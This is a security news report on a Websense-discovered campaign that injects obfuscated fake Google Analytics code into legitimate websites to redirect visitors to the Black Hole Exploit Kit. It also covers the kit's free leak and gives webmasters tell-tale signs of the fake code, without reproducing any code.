Injecting malicious code into the HTML used on legitimate Web sites is a key part of the infection lifecycle for many attack crews, and they often disguise and obfuscate their code to make it more difficult to analyze or so it appears to be legitimate code. The latest instance of this technique has seen attackers employing code that is meant to look like Google Analytics snippets, but instead sends victims off to a remote site that’s hosting the Black Hole Exploit Kit. Not the desired result.
Researchers at Websense discovered the ongoing attack recently, and found that the code being used to hide the fake Google Analytics tags is heavily obfuscated, making analysis quite difficult. The malicious code, which is being injected into benign pages on legitimate sites, is designed to look just like actual Google Analytics code and to appear as thought it’s referring to common domains. But there are some tell-tale signs that this isn’t the case.
“It is quite convincing at first glance, but remember, usually we put the analytics code at the bottom of the page, instead of at the top, so this is a good hint to Web masters. Another hint is that they are using “UA-XXXXX-X”, a placeholder as their “Google Analytics account”, obviously this is not what people usually do. We found other similar domains like google-analytics[dot]su in this attack, and will update once we find more,” Websense’s Tim Xia wrote in an analysis of the attack campaign.
The end result of the infection routine is that the victim is passed off to a site that is hosting the Black Hole Exploit Kit, a notoriously nasty piece of software that will try a grab-bag of exploits against the victim’s browser until one works. Once that’s done, another piece of malware typically is installed on the user’s machine, perhaps a keylogger or banker Trojan designed to relieve the victim of her money.
Black Hole is one of several readily available exploit kits that attack crews of all makes and models use to install malware on thousands of machines. Black Hole, along with other kits, such as Eleonore and Siberia, give attackers a built-in set of exploits that can be used to go after vulnerabilities in browsers such as Internet Explorer, Firefox and Chrome. Last spring, a version of Black Hole was uploaded to some file-sharing sites and made available for free. At the time, researchers said that they expected Black Hole to be used in more attacks going forward, and that prediction has been borne out.
“If the ZeuS leak was like giving a machine gun for free, giving away exploit kits is like providing the ammo. We will now see much more use of those exploit and malware kits by less talented groups of cyber criminals,” said Aviv Raff, CTO at security firm Seculert, said at the time of the leak of the free version of Black Hole.